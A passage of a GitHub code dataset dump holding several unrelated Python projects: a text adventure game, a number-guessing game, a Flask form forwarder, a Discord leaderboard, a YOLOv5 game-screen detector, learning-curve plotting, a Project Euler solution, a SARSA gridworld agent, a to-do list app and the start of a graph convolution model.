\"l\"]\n prisonerInput = \"\"\n while prisonerInput not in prisonerOptions:\n print(\"\"\" You cross the hallway and approach the groaning prisoner. He dangles by locked iron manacles \"Oh, hello there. Is that someone? It's been so long\n I can hardly see anymore.\" he creaks. \"Will you help me?\" \"\"\")\n if player.wisdom >= 18:\n print(\"As you listen to the man you get an eery feeling from him. Some part of this individual seems coiled to strike.\")\n prisonerInput = input(\"Options: (h)elp with the manacles/(l)eave him be \") \n if prisonerInput == \"h\":\n print(\"\"\"\"As you approach the prisoner he cackles \"Bahah, someone is a bit too trusting.\" The manacles detach from the walls, elongating, shifting, and hardening\n until they ressemble spikes made of bone prottruding from the forearms of the prisoner. With teeth now bared to reveal large fangs, the vampire lunges. \n \"\"\")\n vampireFight()\n elif prisonerInput == \"l\":\n print(\"\"\" \"Wait, wait, are you just leaving me? I can help you! You'll never live if you go alone!\" \"\"\")\n dungeon()\n else:\n print(\"please enter a valid option\")\n elif userInput == \"i\":\n chestInput = \"\"\n chestOptions = [\"s\",\"p\",\"t\"]\n while chestInput not in chestOptions:\n print(\"As you stand in front of the chest it appears to be mildly rotten but it \")\n chestInput = input(\"Options: (p)ick lock/(s)mash it/(tu)rn away\")\n if chestInput == \"t\":\n dungeon()\n elif chestInput == \"p\":\n if chestUnlocked == False:\n if player.tool == Tool[\"Lockpick\"]:\n print(\"You succesfully open the chest and pull out a small ornate crystalline bottle filled with a viscous red fluid inside. This health potion will save you from death once\")\n player.hpPotions += 1\n chestUnlocked = True\n dungeon() \n else:\n print(\"You don't have the tools or expertise to do that.\")\n input(\"Press enter to continue\")\n dungeon()\n else:\n print(\"The chest is already open, leave dweebus.\")\n input(\"Press enter to continue\")\n dungeon()\n elif chestInput == \"s\":\n if chestUnlocked == False:\n if player.strength >= 20:\n print(\"\"\"Using your massive muscles you tear the chest in twain. Unfortunately you seem to have broken th small bottle that was in the chest.\"\"\")\n chestUnlocked == True\n dungeon()\n else:\n print(\"Unfortunately you're too weak. The chest sits there mockingly.\")\n dungeon()\n else:\n print(\"The chest is already in pieces.\")\n dungeon()\n elif userInput == \"c\":\n print(\"As you slowly walk down the corridor, away from the pleas of the prisoner, you feel an unnatural cold wash over you and hear chanting ahead.\")\n cultGathering()\n else:\n print(\"please enter a valid option.\")\n \ndef vampireFight():\n vampire = monster(\"vampire\", 50, 12, Spells, Shields, 15)\n currentCombat = combat() \n input(\"Press enter to continue \")\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,vampire)\n currentCombat.monsterTurn(player,vampire)\n currentCombat.displayResult(player,vampire)\n currentCombat.checkWin(player,vampire)\n input(\"Press enter to continue\")\n levelUp()\n print(\"As you look around the small dungeon your fight with the vampire smashed the old chest, breaking whatever was inside. It looks like your only choice is to continue forward\")\n time.sleep(2)\n cultGathering()\n\ndef cultGathering():\n actions = [\"s\",\"a\"]\n print(\"\"\"\n As you walk down the hallway you begin to hear eerie voices chanting. Rounding the corner you see 3 cultists standing around a pile of dead sheep.\n It looks like you might be able to sneak around them, but at the same time you get a bad feeling about what would happen if they completed their ritual.\n \"\"\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (s)neak around/(a)mbush them\")\n global ambushed \n ambushed = False\n userInput = input()\n if userInput == \"s\":\n if player.dexterity >= 16:\n print(\"\"\"You successfully stalk around the room, as you sneak through the passageway at the end of the room you get a sinking feeling in your stomach\"\"\")\n denOfTheBeast()\n else:\n print(\"You attempt to sneak around the room but unfortunately you stumble and alert the cultists who quickly draw daggers and charge you.\")\n ambushed = True \n cultistFight() \n elif userInput == \"a\":\n print(\"Rushing right in you manage to get the drop on one of the cultists, killing him, before the other two draw their daggers and turn towards you.\")\n cultistFight()\n else: \n print(\"Please enter a valid option.\")\n quit()\n\ndef cultistFight():\n numCultists = 3\n cultistsKilled = 0\n global ambushed\n if ambushed == True:\n numCultists = 2\n while cultistsKilled < numCultists:\n currentCombat = combat() \n cultist = monster(\"cultist\", 70, 15, Weapons, Shields, 15)\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,cultist)\n currentCombat.monsterTurn(player,cultist)\n currentCombat.displayResult(player,cultist)\n currentCombat.checkWin(player,cultist)\n input(\"Press enter to continue\")\n cultistsKilled += 1\n print(\"One down\")\n levelUp()\n print(\"\"\"\n Standing over the bodies of the cultists you're drawn deeper into the dungeon towards the breathing.\n \"\"\")\n input(\"Press enter to continue\")\n denOfTheBeast()\n \n\ndef denOfTheBeast():\n rightHead = monster(\"Golden head\", 100 , 25, Weapons , Resistances, 15) \n leftHead = monster(\"Black head\", 150, 15, Weapons, Resistances, 15)\n krushok = monster(\"Krushok\", 400, 30, None, None, 55)\n actions = [\"l\",\"r\"]\n rightHeadDead = False\n leftHeadDead = False\n print(\"\"\" \n Upon entering the room you find yourself in what looks like a large ampitheater. You don't feel like you walked upwards at any\n point, yet you're somehow on a mountaintop. Over the edges of the ampitheater you can see down into the valley where little towns speckle the hillsides.\n In the middle\n of the ampitheater, illuminated by the light of the full moon, lies the source of the breathing. Shackles as large around as you\n bind every limb of a creature you don't recognize. It almost looks like a cerberous but the body is too feline and the heads look almost draconic, something\n about the lines of its face. Slightly more angular and rigid than they should be with smoke rising from the nostrils of the right head.\n Everything about this creature reeks of unnatural magic. \n\n As you take one quiet step into the ampitheater you hear the grinding of stone behind you as the passageway seemingly closes of its own accord. \n Disturbed by the grinding the right head lazily opens its eyes predatory inquisition, revealing eyes comsumed by a golden iris with a slitted\n pupil being the only break in the sheen. As the beast rises to its feat it creates almost no sound, save growl now emitting from the right head.\n Hastily looking around the circular ampitheater you don't see a way out. Maybe because of the chains you could run it in a circle and fight only one head\n but you have to choose quickly. Glancing at the approaching creature you see that its left head is completely blind, eyelids flicking over empty socket,\n that being said it also looks physically stronger than the left head. \n \"\"\")\n userInput = \"\"\n def rightHeadFight():\n currentCombat = combat()\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,rightHead)\n currentCombat.monsterTurn(player,rightHead)\n currentCombat.displayResult(player,rightHead)\n currentCombat.checkWin(player,rightHead)\n input(\"Press enter to continue\")\n levelUp()\n rightHeadDead = True \n if leftHeadDead == False:\n print(\"Cutting the right head down causes the left to roar in agony and spit fire at you.\")\n time.sleep(2)\n leftHeadFight()\n else:\n time.sleep(1)\n krushok()\n def leftHeadFight():\n currentCombat = combat()\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,leftHead)\n currentCombat.monsterTurn(player,leftHead)\n currentCombat.displayResult(player,leftHead)\n currentCombat.checkWin(player,leftHead)\n input(\"Press enter to continue\")\n levelUp()\n rightLeftDead = True \n if rightHeadDead == False:\n print(\"As the smoke from the left head dies the right head takes a deep breath through its nose. Picking up your scent it turns it's empty eyes to you.\")\n time.sleep(2)\n rightHeadFight()\n else:\n time.sleep(1)\n krushok()\n def krushok():\n # as you kill it the blood will flow out into the veins of what you now realize is an alter and then the moon cracks and Krushok comes out.\n print(\"\"\"\n As you triumphantly stand over the defeated beast you feel a sense of dread seep into you. Blood draining from the wounds of the giant creature begins to \n flow into veins cut in the stone, revealing the acropolis for what it is, an altar. The now blood soaked veins in the stone begin to form a pattern and the moon\n begins to glow red, cracks emerging in it that mimic the pattern in the altar. Before you can think to stop the bleeding the air is pulled from your lungs, drawn in\n by some kind of incredible gravity, just before you begin to see the moon crumple. Meteors and debris begin falling from the sky around you just as the shockwave hits, knocking\n you over just in time to see a small meteor hit the center of the altar, and stand up. \n \n Your mind travels back to your childhood fairy tales. Particularly one where the old gods chained an untameable evil inside the Moon to protect the Earth, Krushok.\n Now free, the Firstborn Tyrant of the Moon stands over 30ft tall and in the middle of the acropolis. His bottom half is covered in opulescent white scales and is lean and\n clawed like a dragon. His top half is gaunt from millenia of imprisonment but even with skin hugging the bones of his more human half he appears terrifyingly strong.\n Eyes milky white and scarred over, flexing his huge tattered raven wings stolen from Odin's stock, and a wrath unlike any other, Krushok turns towards you. With a noise like inverted\n thunder, pulling you in, Krushok summons a spear of pure moonlight and stalks towards you\n \"\"\")\n currentCombat = combat()\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,krushok)\n currentCombat.monsterTurn(player,krushok)\n currentCombat.displayResult(player,krushok)\n currentCombat.checkWin(player,krushok)\n input(\"Press enter to continue\")\n levelUp()\n print(\"\"\"\n With one final devastating blow you strike down the ancient god of death and bring peace to the Earth.\n \n If you got this far, congrats! Not only have you won but you have defied all my expectations and managed to beat the game.\n \"\"\")\n\n while userInput not in actions:\n print(\"I looks like you'll have to fight the beast either way but if you circle it correctly you might be able to take it on one head at a time.\")\n print(\"Options: (r)ight/(l)eft\")\n userInput = input()\n if userInput == \"l\":\n leftHeadFight()\n elif userInput == \"l\":\n rightHeadFight()\n else:\n print(\"Please enter a valid option\")\n\nif __name__ == \"__main__\":\n \n while True:\n\n \n print(\"Welcome to the mystical land of Tabletopia\")\n \n print(\"As an avid traveler, you have decided to visit the Catacombs of a nearby temple.\")\n \n print(\"However, during your exploration, you find yourself lost.\")\n \n playeracterSelect()\n\n","repo_name":"00Sarge/TextAdventure","sub_path":"Final/Tabletopia_1.0.py","file_name":"Tabletopia_1.0.py","file_ext":"py","file_size_in_byte":44938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"848996216","text":"\"\"\" \n PROJECT 02 : MAGIC NUMBER GAME\n Author : Vansen Hengmeanrith AKA Chris\n Email : vansenhengmeanrith17@kit.edu.kh\n Created : 21 May 2019\n Instructor : Kevin Sabbe\n Language : Python\n\"\"\"\n\nimport random\n\n# Computer think of a random number from (1 to 100)\nmagicNumber = random.randrange(1,100+1)\n\n# Declare count for counting the number of times the player guess\ncount = 0\n\n# Declare forever loop(s) and other loop(s)\nforeverLoop_One = True\nplayAgainLoop = True\n\n# Getting name input\nnameInput = input(\"Hello, what is your name?\\n>> \")\n\n# Getting the first guessing number\nguessTheNumberInput = input(\"Well \" + nameInput + \", try to guess the number I have in mind!\\n>> \")\n\n# Forever loop until the player gets the number correct\nwhile foreverLoop_One :\n # Check if the number is equal to the magic number\n if int(guessTheNumberInput) == magicNumber :\n # When the player guess the count var will increment sequentially, same goes for the other count += 1\n count +=1\n # Check if it is 1 time\n if int(count) == 1 :\n print(\"You won in 1 turn only, that’s amazing!\")\n else :\n print(\"It took you \" + str(count) + \" turns to guess my number which was \" + str(magicNumber) +\"!\")\n \n # Forever loop until the player enter the correct input\n while playAgainLoop :\n choiceInput = input(\"Do you want to play again? [Y/N]\\n>> \")\n\n if choiceInput == \"Y\" :\n # Resetting the magic number and count variables\n magicNumber = random.randrange(1,100+1)\n count = 0\n guessTheNumberInput = input(\"Well \" + nameInput + \", try to guess the number I have in mind!\\n>> \")\n \n # Break from loop\n break\n elif choiceInput == \"N\" :\n print(\"Ok, bye \" + nameInput +\"! See you later!\")\n exit()\n else :\n print(\"Sorry, I did not understand. Let me repeat: \")\n\n # Check if the number is greater than the magic number\n elif int(guessTheNumberInput) > magicNumber :\n count +=1\n guessTheNumberInput = input(\"Too high, try again!\\n>> \")\n \n # Check if the number is lesser than the magic number\n elif int(guessTheNumberInput) < magicNumber :\n count +=1\n guessTheNumberInput = input(\"Too low, try again!\\n>> \")","repo_name":"ChrisLegaxy/python-bootcamp","sub_path":"vansenhengmeanrith17/week01/projects/02_magic.py","file_name":"02_magic.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2489290829","text":"from flask import Flask, redirect, url_for, request, render_template, request\nimport requests\n\napp = Flask(__name__)\n\n\n@app.route('/task',methods = ['POST'])\ndef task():\n if request.method == 'POST':\n target = request.form['target']\n array_size = request.form['array_size']\n numbers = request.form['numbers']\n if target == '' or array_size == '' or numbers == '' :\n return \"Please fill all input fields!!\"\n r = requests.post('https://gp-task-algorithm.herokuapp.com/', data={\"n\":array_size, \"t\":target, \"i\":numbers} )\n json_object = r.text\n return json_object\n\n\n\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"Youssef11khaled99/flask-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16724590604","text":"import discord\nimport sqlite3\n\nconn = sqlite3.connect('db/balances.db')\nconn.execute('CREATE TABLE IF NOT EXISTS balances (user_id INTEGER PRIMARY KEY, balance INTEGER NOT NULL DEFAULT 0)')\n\nasync def leaderboard(ctx, client):\n class DeleteButton(discord.ui.View):\n async def on_timeout(self):\n for child in self.children:\n child.disabled = True\n await self.message.edit(view=self)\n @discord.ui.button(label=\"Delete\",style=discord.ButtonStyle.danger,custom_id=f\"delete_{ctx.message.id}\")\n async def delete(self, interaction: discord.Interaction, button: discord.ui.Button):\n if button.custom_id == f\"delete_{ctx.message.id}\":\n await interaction.response.defer()\n await interaction.message.delete()\n self.stop()\n # Get the balances from the database\n cursor = conn.execute('SELECT user_id, balance FROM balances ORDER BY balance DESC')\n rows = cursor.fetchall()\n\n # Create the leaderboard embed message\n embed = discord.Embed(title=\"Blackjack Leaderboard\", color=0xff0000)\n\n for i, row in enumerate(rows):\n user = client.get_user(row[0])\n name = user.name if user else \"Unknown User\"\n balance = row[1]\n\n embed.add_field(name=f\"{i+1}. {name}\", value=f\"{balance} chips\", inline=False)\n\n view = DeleteButton(timeout=10 * 60)\n await ctx.send(embed=embed, view=view)","repo_name":"TheVaxly/ChatBot-Larry-","sub_path":"commands/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11207952050","text":"import cv2 as cv\nfrom threading import Thread, Lock\n\nimport yolo_v5 as yolo \n\n\nclass Detection:\n\n # ['Tower', 'Canon_Minion', 'caster_minion', 'Melee_Minion', 'Ezreal']\n\n CONF_THRESHOLD = 0.6\n IGNORE_CALSSES = [ 0.0, 4.0]\n\n stopped = True\n lock = None\n rectangles = []\n conf = []\n classes = []\n screenshot = None\n dtc = None\n\n def __init__(self):\n\n self.lock = Lock()\n self.dtc = yolo.detector()\n\n def update(self, screenshot):\n self.lock.acquire()\n self.screenshot = screenshot\n self.lock.release()\n\n def start(self):\n self.stopped = False\n t = Thread(target=self.run)\n t.start()\n\n def stop(self):\n self.stopped = True\n\n def run(self):\n while not self.stopped:\n if not self.screenshot is None:\n\n img = self.dtc.detect(cv.cvtColor(self.screenshot, cv.COLOR_RGB2BGR)).pred[0]\n\n # Get rectangles from prediction\n rectangels = []\n conf = []\n classes = [] \n for b_box in img:\n rect = [b_box[0].item(), b_box[1].item(), b_box[2].item(), b_box[3].item()]\n if b_box[4] > self.CONF_THRESHOLD and b_box[5].item() not in self.IGNORE_CALSSES:\n rectangels.append(rect)\n conf.append(b_box[4].item())\n classes.append(b_box[5].item())\n \n self.lock.acquire()\n self.rectangles = rectangels\n self.conf = conf\n self.classes = classes\n self.lock.release()","repo_name":"fokkinkniels/League_ai","sub_path":"bot/Detection.py","file_name":"Detection.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71968785274","text":"import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import clone\nfrom sklearn.model_selection import learning_curve\nfrom tqdm import tqdm\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=1, train_sizes=np.linspace(.2, 1.0, 5),\n scoring=\"neg_mean_squared_error\"):\n \"\"\"\n Generate a simple plot of the test and training learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - An object to be used as a cross-validation generator.\n - An iterable yielding train/test splits.\n\n For integer/None inputs, if ``y`` is binary or multiclass,\n :class:`StratifiedKFold` used. If the estimator is not a classifier\n or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.\n\n Refer :ref:`User Guide <cross_validation>` for the various\n cross-validators that can be used here.\n\n n_jobs : integer, optional\n Number of jobs to run in parallel (default 1).\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes, scoring=scoring)\n train_scores_mean = -np.mean(train_scores, axis=1)\n train_scores_std = -np.std(train_scores, axis=1)\n test_scores_mean = -np.mean(test_scores, axis=1)\n test_scores_std = -np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n\ndef plot_triple_curve(estimator, title, data, target, X_test, y_test, cv, scoring, outliers, ylim=None,\n n_jobs=1, train_sizes=np.linspace(.2, 1.0, 5)):\n font = {'family' : 'normal',\n # 'weight' : 'bold',\n 'size' : 22}\n\n matplotlib.rc('font', **font)\n fig = plt.figure(figsize=(11,8))\n # plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"relative training set size\")\n plt.ylabel(\"error\")\n train_sizes, train_scores, cv_scores, test_scores = triple_curve(\n estimator, data, target, X_test, y_test, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes, scoring=scoring)\n train_scores_mean = np.mean(train_scores, axis=0)\n train_scores_std = np.std(train_scores, axis=0)\n cv_scores_mean = np.mean(cv_scores, axis=0)\n cv_scores_std = np.std(cv_scores, axis=0)\n test_scores_mean = np.mean(test_scores, axis=0)\n test_scores_std = np.std(test_scores, axis=0)\n\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, cv_scores_mean - cv_scores_std,\n cv_scores_mean + cv_scores_std, alpha=0.1,\n color=\"g\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1,\n color=\"b\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"train\")\n plt.plot(train_sizes, cv_scores_mean, 'o-', color=\"g\",\n label=\"cv\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"b\",\n label=\"test\")\n\n plt.legend(loc=\"best\")\n\n # plt.yscale('log')\n plt.tight_layout()\n return plt\n\n\ndef triple_curve(model, data, target, X_test, y_test, cv, train_sizes, scoring, n_jobs=1, outliers=None):\n test_scores = [[] for i in range(cv.n_splits)]\n train_scores = [[] for i in range(cv.n_splits)]\n cv_scores = [[] for i in range(cv.n_splits)]\n for i, (train_index, test_index) in enumerate(cv.split(data, data[target])):\n size = len(train_index)\n train_chunks_sizes = [int(size * chunk) for chunk in train_sizes]\n data_test = data.loc[test_index].copy()\n data_train = data.loc[train_index].copy()\n X_cv = data_test.drop(target, axis=1)\n y_cv = data_test[target]\n print(i)\n for chunk_size in tqdm(train_chunks_sizes):\n data_tmp = data_train.iloc[:chunk_size]\n X_tmp = data_tmp.drop(target, axis=1)\n y_tmp = data_tmp[target]\n model_tmp = clone(model)\n model_tmp.fit(X_tmp, y_tmp)\n print(model_tmp.predict(X_tmp.copy()))\n train_scores[i].append(scoring(y_tmp, model_tmp.predict(X_tmp.copy())))\n cv_scores[i].append(scoring(y_cv, model_tmp.predict(X_cv.copy())))\n test_scores[i].append(scoring(y_test, model_tmp.predict(X_test.copy())))\n print(train_scores[i])\n print(test_scores[i])\n\n return train_sizes, np.array(train_scores), np.array(cv_scores), np.array(test_scores)","repo_name":"jlatko/review_of_preprocessing_methods","sub_path":"diagnostics/learning_curves.py","file_name":"learning_curves.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20562499681","text":"\"\"\"\nSummary:\nSuppose you make 17 16 15 14 13\na spiral like the 18 5 4 3 12\none shown here, 19 6 1 2 11\nstarting with 1 20 7 8 9 10\nand wrapping around. 21 22 23 24 25\n\n3 of the 9 numbers in the diagonals are prime.\nWhat is the minimum amount of layers such that less than\n10 % of the numbers in the diagonals are prime?\n\"\"\"\nimport time\nstart =time.clock()\n\n#primality test good for n < 4,759,123,141\n#see https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test\ndef rabin_miller(n):\n if n in [2,7,61]:\n return True\n if not n % 2:\n return False\n\n def check(a, s, d, n):\n x = pow(a,d,n)\n if x == 1:\n return True\n for i in range(s - 1):\n if x == n - 1:\n return True\n x = pow(x, 2, n)\n return x == n - 1\n\n s = 0\n d = n - 1\n\n while d % 2 == 0:\n d //= 2\n s += 1\n\n for a in (2,7,61):\n if not check(a,s,d,n):\n return False\n return True\n\n\nPRIME_PERCENT = 10\nn = 3\nprime_count = 0 \n\nwhile True:\n for i in (1, 2, 3):\n prime_count += rabin_miller( n*n - i*n + i)\n ratio = (100 * prime_count) / (2*n - 1)\n if ratio < PRIME_PERCENT:\n break\n n += 2\n\nprint(n,time.clock()-start)\n","repo_name":"jasongros619/Project-Euler","sub_path":"51 - 60/Euler 058 Spiral primes.py","file_name":"Euler 058 Spiral primes.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40916363294","text":"'''\nSource codes for PyTorch 1.0 Reinforcement Learning (Packt Publishing)\nChapter 4: Temporal Difference and Q-Learning\nAuthor: Yuxi (Hayden) Liu\n'''\n\nimport torch\n\nfrom windy_gridworld import WindyGridworldEnv\n\nenv = WindyGridworldEnv()\n\n\ndef gen_epsilon_greedy_policy(n_action, epsilon):\n def policy_function(state, Q):\n probs = torch.ones(n_action) * epsilon / n_action\n best_action = torch.argmax(Q[state]).item()\n probs[best_action] += 1.0 - epsilon\n action = torch.multinomial(probs, 1).item()\n return action\n return policy_function\n\n\nfrom collections import defaultdict\n\n\n\ndef sarsa(env, gamma, n_episode, alpha):\n \"\"\"\n Obtain the optimal policy with on-policy SARSA algorithm\n @param env: OpenAI Gym environment\n @param gamma: discount factor\n @param n_episode: number of episodes\n @return: the optimal Q-function, and the optimal policy\n \"\"\"\n n_action = env.action_space.n\n Q = defaultdict(lambda: torch.zeros(n_action))\n for episode in range(n_episode):\n state = env.reset()\n is_done = False\n action = epsilon_greedy_policy(state, Q)\n while not is_done:\n next_state, reward, is_done, info = env.step(action)\n next_action = epsilon_greedy_policy(next_state, Q)\n td_delta = reward + gamma * Q[next_state][next_action] - Q[state][action]\n Q[state][action] += alpha * td_delta\n length_episode[episode] += 1\n total_reward_episode[episode] += reward\n if is_done:\n break\n state = next_state\n action = next_action\n policy = {}\n for state, actions in Q.items():\n policy[state] = torch.argmax(actions).item()\n return Q, policy\n\ngamma = 1\n\nn_episode = 500\n\nalpha = 0.4\n\nepsilon = 0.1\n\nepsilon_greedy_policy = gen_epsilon_greedy_policy(env.action_space.n, epsilon)\n\nlength_episode = [0] * n_episode\ntotal_reward_episode = [0] * n_episode\n\noptimal_Q, optimal_policy = sarsa(env, gamma, n_episode, alpha)\n\n\nprint('The optimal policy:\\n', optimal_policy)\n\n\n\n\nimport matplotlib.pyplot as plt\nplt.plot(length_episode)\nplt.title('Episode length over time')\nplt.xlabel('Episode')\nplt.ylabel('Length')\nplt.show()\n\n\nplt.plot(total_reward_episode)\nplt.title('Episode reward over time')\nplt.xlabel('Episode')\nplt.ylabel('Total reward')\nplt.show()\n\n\n","repo_name":"PacktPublishing/PyTorch-1.x-Reinforcement-Learning-Cookbook","sub_path":"Chapter04/chapter4/sarsa.py","file_name":"sarsa.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"95"} +{"seq_id":"44334411791","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import Column, Integer, String, Date, create_engine\nfrom datetime import datetime, timedelta\n\nBase = declarative_base()\n\n\nclass Table(Base):\n __tablename__ = 'task'\n id = Column(Integer, primary_key=True)\n task = Column(String, default='Nothing')\n deadline = Column(Date, default=datetime.now())\n\n def __repr__(self):\n return self.task\n\n\ndef add_task(task, deadline):\n global session\n new_row = Table(task=task, deadline=datetime.strptime(deadline, '%Y-%m-%d'))\n session.add(new_row)\n session.commit()\n print(\"The task has been added!\")\n\n\ndef print_this_day(rows):\n if len(rows) == 0:\n print(\"Nothing to do!\")\n else:\n for i, row in enumerate(rows, start=1):\n print(f\"{i}. {row}\")\n\n\ndef filter_by_date(date):\n rows = session.query(Table).filter(Table.deadline == date.date())\n rows = rows.order_by(Table.deadline).all()\n return rows\n\n\ndef show_all_tasks(period=\"all\"):\n global session\n if period == \"all\":\n rows = session.query(Table).order_by(Table.deadline).all()\n for i, row in enumerate(rows, start=1):\n print(f\"{i}. {row}. {row.deadline.strftime('%-d %b')}\")\n return rows\n elif period == \"today\":\n today = datetime.today()\n rows = filter_by_date(today)\n print(f\"Today {today.strftime('%-d %b')}:\")\n print_this_day(rows)\n elif period == \"week\":\n today = datetime.today()\n for i in range(7):\n date = today + timedelta(days=i)\n rows = filter_by_date(date)\n print()\n print(date.strftime(\"%A %-d %b:\"))\n print_this_day(rows)\n\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\nBase.metadata.create_all(engine)\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nwhile True:\n user_input = int(input(\"\"\"1) Today's tasks\n2) Week's tasks\n3) All tasks\n4) Missed tasks\n5) Add task\n6) Delete task\n0) Exit\\n\"\"\"))\n if user_input == 0:\n break\n elif user_input == 1:\n show_all_tasks(\"today\")\n elif user_input == 2:\n show_all_tasks(\"week\")\n elif user_input == 3:\n print(\"All tasks:\")\n show_all_tasks()\n elif user_input == 4:\n print(\"Missed tasks:\")\n outer_rows = session.query(Table).filter(Table.deadline < datetime.today().date())\n outer_rows = outer_rows.order_by(Table.deadline).all()\n if len(outer_rows) == 0:\n print(\"Nothing is missed!\")\n else:\n for j, outer_row in enumerate(outer_rows, start=1):\n print(f\"{j}. {outer_row}. {outer_row.deadline.strftime('%-d %b')}\")\n print()\n elif user_input == 5:\n outer_task = input(\"Enter task\\n\")\n outer_deadline = input(\"Enter deadline\\n\")\n add_task(outer_task, outer_deadline)\n elif user_input == 6:\n print(\"Choose the number of the task you want to delete:\")\n outer_rows = show_all_tasks()\n user_input = int(input())\n session.delete(outer_rows[user_input - 1])\n session.commit()\n print(\"The task has been deleted!\")\n\nprint(\"Bye!\")","repo_name":"homerico/jetbrains_academy_projects","sub_path":"to_do_list/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34703940052","text":"'''\nhttps://www.codewars.com/kata/52f3149496de55aded000410/solutions/python\nWrite a function named sumDigits which takes a number as input and returns the sum of \nthe absolute value of each of the number's decimal digits. \n'''\n\ndef sum_digits(number):\n sum = 0\n number = abs(number)\n while(number > 0):\n sum += number % 10\n number //= 10\n return sum\n\n#test.assert_equals(sum_digits(10), 1)\n#test.assert_equals(sum_digits(99), 18)\n#test.assert_equals(sum_digits(-32), 5)\n\n##A bad solution, that people seem to think is either good practice, or clever:\n#def sumDigits(number):\n# return sum(int(d) for d in str(abs(number)))\n\n#As a once-off, this is okay. But converting an integer to a string\n#an expensive operation compared to simple modding and division.\n\n","repo_name":"matthewzar/CodeWarsKatas","sub_path":"Python/Kyu7/SumOfDigits.py","file_name":"SumOfDigits.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"5640354139","text":"# -*- coding:utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom model.GCN import GCN\nimport time\nfrom model.Subgraph import sub_graph_parallel\n\n\nclass MGCN(nn.Module):\n '''\n Multi range Gcn\n 计算不同范围GCN\n '''\n\n def __init__(self, L_tilde, dim_in, dim_out, range_K, device, in_drop=0.0,\n gcn_drop=0.0, residual=False):\n '''\n :param range_K: k ranges\n :param adj:(V,V)\n :param V:number of node\n :param dim_in: int, num of channels in the input sequence\n :param dim_out: int, num of node channels in the output sequence\n '''\n super(MGCN, self).__init__()\n self.DEVICE = device\n self.K = range_K\n self.GCN_khops_node = nn.ModuleList(\n [GCN(L_tilde, dim_in, dim_out, k + 1, device, in_drop=in_drop, gcn_drop=gcn_drop,\n residual=residual) for k in range(self.K)])\n self.linear = nn.Linear(dim_out, dim_in)\n\n self.W = 